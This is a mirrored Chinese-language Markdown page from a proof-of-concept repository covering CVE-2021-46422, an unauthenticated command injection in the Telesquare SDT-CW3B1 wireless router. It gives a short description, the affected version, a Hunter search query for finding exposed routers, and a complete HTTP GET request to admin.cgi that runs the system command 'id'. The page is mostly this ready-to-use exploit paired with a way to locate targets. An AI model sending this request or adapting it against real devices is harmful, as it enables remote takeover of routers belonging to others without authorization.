mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-08-13 03:16:31 +00:00
32 lines
1.3 KiB
Markdown
32 lines
1.3 KiB
Markdown
![]() |
# Telesquare SDT-CW3B1无线路由器admin.cgi 远程命令执行漏洞(CVE-2021-46422)
|
||
|
|
||
|
# 一、漏洞简介
|
||
|
Telesquare SDT-CW3B1是韩国Telesquare公司的无线路由器产品。Telesquare SDT-CW3B1 1.1.0 版本存在操作系统命令注入漏洞。远程攻击者可利用该漏洞在无需任何身份验证的情况下执行操作系统命令。
|
||
|
|
||
|
# 二、影响版本
|
||
|
+ Telesquare SDT-CW3B1 1.1.0
|
||
|
|
||
|
# 三、资产测绘
|
||
|
+ hunter`app.name=="Telesquare Router"`
|
||
|
+ 特征
|
||
|
|
||
|

|
||
|
|
||
|
# 四、漏洞复现
|
||
|
```plain
|
||
|
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1
|
||
|
Host: xx.xx.xx.xx
|
||
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
|
||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
|
Accept-Encoding: gzip, deflate
|
||
|
Connection: close
|
||
|
Upgrade-Insecure-Requests: 1
|
||
|
```
|
||
|
|
||
|

|
||
|
|
||
|
|
||
|
|
||
|
> 更新: 2024-02-29 23:57:13
|
||
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qig0nr6ohmhnx304>
|